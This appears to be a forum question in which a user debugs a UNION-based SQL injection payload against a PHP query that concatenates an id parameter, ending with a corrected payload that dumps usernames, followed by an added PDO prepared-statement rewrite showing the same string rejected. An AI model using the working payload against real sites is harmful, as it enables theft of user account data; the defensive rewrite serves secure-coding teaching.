I have this code:
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
$result=mysql_query($sql);
and the URL will be like:
site.com/aa/?id=1
So I try to add this value:
site.com/aa/?id=-1 union select 1,group_concat(username),3 from users AND 1=1
So the query will be like:
-1 union select 1,group_concat(username),3 from users and 1=1 LIMIT 0,1
When I try to put the code above, I face the SQL error:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'AND 1=1 LIMIT 0,1' at line 1
Why is that? And how can I use the SQL injection without errors?
OK, thanks all. I found the problem was that I added and 1=1 after from, so that's false in syntax. To solve it, I just removed and 1=1 and put my payload like this: -1 union select 1,group_concat(username),3 from users and it works :D.
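The query in the post is injectable because $id is concatenated into the SQL text. As an added example that is not part of the original post, this is the same lookup with the value validated and bound as a parameter. It assumes PDO with an in-memory SQLite table (constructed sample data) so that it runs stand-alone, and find_user is a hypothetical helper name.

```php
<?php
// Constructed in-memory table standing in for the post's `users` table.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)');
$pdo->exec("INSERT INTO users (username, password) VALUES ('alice', 'x'), ('bob', 'y')");

// Hypothetical helper: look up one user by the `id` request parameter.
function find_user(PDO $pdo, string $rawId): ?array
{
    // Accept only a plain positive integer; anything else never reaches the database.
    $id = filter_var($rawId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return null;
    }

    // The placeholder keeps the value out of the SQL text, so it is always
    // treated as data and cannot change the structure of the statement.
    $stmt = $pdo->prepare('SELECT id, username FROM users WHERE id = :id LIMIT 1');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();

    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Constructed inputs: a normal id, and the string from the post.
$inputs = ['1', '-1 union select 1,group_concat(username),3 from users'];
foreach ($inputs as $input) {
    $row = find_user($pdo, $input);
    echo str_pad($input, 60), ' => ', $row === null ? 'no row' : json_encode($row), PHP_EOL;
}
```

The mysql_* functions used in the post were removed in PHP 7; PDO or mysqli prepared statements are the supported way to run this query against MySQL.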